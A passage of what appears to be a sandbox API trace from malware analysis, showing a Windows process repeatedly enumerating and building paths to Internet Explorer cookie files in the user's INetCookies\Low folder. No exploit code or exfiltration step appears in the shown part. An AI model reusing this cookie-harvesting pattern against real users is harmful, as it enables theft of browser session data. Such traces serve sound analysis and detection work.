pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DQI7WAG8.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DQI7WAG8.txt" [0251.424] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.424] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.424] lstrlenW (lpString="DRDF2EZX.txt") returned 12 [0251.424] lstrlenW (lpString="*.txt") returned 5 [0251.424] wcscpy (in: _Dest=0x79cae18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.424] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.424] PathCombineW (in: pszDest=0x79cae18, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="DRDF2EZX.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DRDF2EZX.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DRDF2EZX.txt" [0251.424] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.424] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.424] lstrlenW (lpString="E2KPI4ZI.txt") returned 12 [0251.424] lstrlenW (lpString="*.txt") returned 5 [0251.424] wcscpy (in: _Dest=0x79cb8b8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.424] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.424] PathCombineW (in: pszDest=0x79cb8b8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="E2KPI4ZI.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\E2KPI4ZI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\E2KPI4ZI.txt" [0251.424] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.424] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.424] lstrlenW (lpString="E978TFRK.txt") returned 12 [0251.424] lstrlenW (lpString="*.txt") returned 5 [0251.425] wcscpy (in: _Dest=0x79cbad8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.425] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.425] PathCombineW (in: pszDest=0x79cbad8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="E978TFRK.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\E978TFRK.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\E978TFRK.txt" [0251.425] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.425] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.425] lstrlenW (lpString="F68MFAMN.txt") returned 12 [0251.425] lstrlenW (lpString="*.txt") returned 5 [0251.425] wcscpy (in: _Dest=0x79cbbe8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.425] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.425] PathCombineW (in: pszDest=0x79cbbe8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="F68MFAMN.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\F68MFAMN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\F68MFAMN.txt" [0251.425] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.425] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.425] lstrlenW (lpString="FCGXHIFT.txt") returned 12 [0251.425] lstrlenW (lpString="*.txt") returned 5 [0251.425] wcscpy (in: _Dest=0x79cabf8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.425] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.425] PathCombineW (in: pszDest=0x79cabf8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="FCGXHIFT.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FCGXHIFT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FCGXHIFT.txt" [0251.425] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.425] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.425] lstrlenW (lpString="FGTTES1V.txt") returned 12 [0251.425] lstrlenW (lpString="*.txt") returned 5 [0251.425] wcscpy (in: _Dest=0x79cbcf8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.425] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.425] PathCombineW (in: pszDest=0x79cbcf8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="FGTTES1V.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FGTTES1V.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FGTTES1V.txt" [0251.425] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.425] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.425] lstrlenW (lpString="FLTMVY1F.txt") returned 12 [0251.425] lstrlenW (lpString="*.txt") returned 5 [0251.426] wcscpy (in: _Dest=0x79cbf18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.426] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.426] PathCombineW (in: pszDest=0x79cbf18, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="FLTMVY1F.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FLTMVY1F.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FLTMVY1F.txt" [0251.426] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.426] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.426] lstrlenW (lpString="FOLSAQT6.txt") returned 12 [0251.426] lstrlenW (lpString="*.txt") returned 5 [0251.426] wcscpy (in: _Dest=0x79ca158, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.426] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.426] PathCombineW (in: pszDest=0x79ca158, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="FOLSAQT6.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FOLSAQT6.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FOLSAQT6.txt" [0251.426] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.426] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.426] lstrlenW (lpString="GXB342YS.txt") returned 12 [0251.426] lstrlenW (lpString="*.txt") returned 5 [0251.426] wcscpy (in: _Dest=0x79ca598, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.426] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.426] PathCombineW (in: pszDest=0x79ca598, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="GXB342YS.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\GXB342YS.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\GXB342YS.txt" [0251.426] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.426] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.426] lstrlenW (lpString="H5LCJX1B.txt") returned 12 [0251.426] lstrlenW (lpString="*.txt") returned 5 [0251.426] wcscpy (in: _Dest=0x79ca6a8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.426] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.426] PathCombineW (in: pszDest=0x79ca6a8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="H5LCJX1B.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\H5LCJX1B.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\H5LCJX1B.txt" [0251.426] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.426] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.426] lstrlenW (lpString="HBPP9XXY.txt") returned 12 [0251.426] lstrlenW (lpString="*.txt") returned 5 [0251.427] wcscpy (in: _Dest=0x79ccaf8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.427] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.427] PathCombineW (in: pszDest=0x79ccaf8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="HBPP9XXY.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HBPP9XXY.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HBPP9XXY.txt" [0251.427] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.427] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.427] lstrlenW (lpString="HF8F6LU0.txt") returned 12 [0251.427] lstrlenW (lpString="*.txt") returned 5 [0251.427] wcscpy (in: _Dest=0x79cc9e8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.427] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.427] PathCombineW (in: pszDest=0x79cc9e8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="HF8F6LU0.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HF8F6LU0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HF8F6LU0.txt" [0251.427] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.427] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.427] lstrlenW (lpString="HTVL5WIW.txt") returned 12 [0251.427] lstrlenW (lpString="*.txt") returned 5 [0251.427] wcscpy (in: _Dest=0x79cd378, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.427] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.427] PathCombineW (in: pszDest=0x79cd378, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="HTVL5WIW.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HTVL5WIW.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\HTVL5WIW.txt" [0251.427] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.427] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.427] lstrlenW (lpString="ILF13HLB.txt") returned 12 [0251.427] lstrlenW (lpString="*.txt") returned 5 [0251.427] wcscpy (in: _Dest=0x79cc278, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.427] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.427] PathCombineW (in: pszDest=0x79cc278, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="ILF13HLB.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ILF13HLB.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ILF13HLB.txt" [0251.427] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.427] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.427] lstrlenW (lpString="ISTFXHHR.txt") returned 12 [0251.428] lstrlenW (lpString="*.txt") returned 5 [0251.428] wcscpy (in: _Dest=0x79cd598, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.428] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.428] PathCombineW (in: pszDest=0x79cd598, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="ISTFXHHR.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ISTFXHHR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ISTFXHHR.txt" [0251.428] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.428] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.428] lstrlenW (lpString="ITD4OUAR.txt") returned 12 [0251.428] lstrlenW (lpString="*.txt") returned 5 [0251.428] wcscpy (in: _Dest=0x79cc498, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.428] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.428] PathCombineW (in: pszDest=0x79cc498, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="ITD4OUAR.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ITD4OUAR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\ITD4OUAR.txt" [0251.428] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.428] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.428] lstrlenW (lpString="J4JSQG9R.txt") returned 12 [0251.428] lstrlenW (lpString="*.txt") returned 5 [0251.428] wcscpy (in: _Dest=0x79cce28, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.428] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.428] PathCombineW (in: pszDest=0x79cce28, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="J4JSQG9R.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\J4JSQG9R.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\J4JSQG9R.txt" [0251.428] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.428] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.428] lstrlenW (lpString="JQOCYKOH.txt") returned 12 [0251.428] lstrlenW (lpString="*.txt") returned 5 [0251.428] wcscpy (in: _Dest=0x79cc6b8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.428] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.428] PathCombineW (in: pszDest=0x79cc6b8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="JQOCYKOH.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\JQOCYKOH.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\JQOCYKOH.txt" [0251.428] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.428] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.428] lstrlenW (lpString="JWFWLAYR.txt") returned 12 [0251.428] lstrlenW (lpString="*.txt") returned 5 [0251.429] wcscpy (in: _Dest=0x79cd7b8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.429] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.429] PathCombineW (in: pszDest=0x79cd7b8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="JWFWLAYR.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\JWFWLAYR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\JWFWLAYR.txt" [0251.429] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.429] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.429] lstrlenW (lpString="K8249Y1G.txt") returned 12 [0251.429] lstrlenW (lpString="*.txt") returned 5 [0251.429] wcscpy (in: _Dest=0x79cc5a8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.429] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.429] PathCombineW (in: pszDest=0x79cc5a8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="K8249Y1G.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\K8249Y1G.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\K8249Y1G.txt" [0251.429] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.429] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.429] lstrlenW (lpString="KNJ4AJDH.txt") returned 12 [0251.429] lstrlenW (lpString="*.txt") returned 5 [0251.429] wcscpy (in: _Dest=0x79cdd08, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.429] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.429] PathCombineW (in: pszDest=0x79cdd08, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="KNJ4AJDH.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\KNJ4AJDH.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\KNJ4AJDH.txt" [0251.429] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.429] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.429] lstrlenW (lpString="L78EW25D.txt") returned 12 [0251.429] lstrlenW (lpString="*.txt") returned 5 [0251.429] wcscpy (in: _Dest=0x79ccc08, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.429] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.429] PathCombineW (in: pszDest=0x79ccc08, 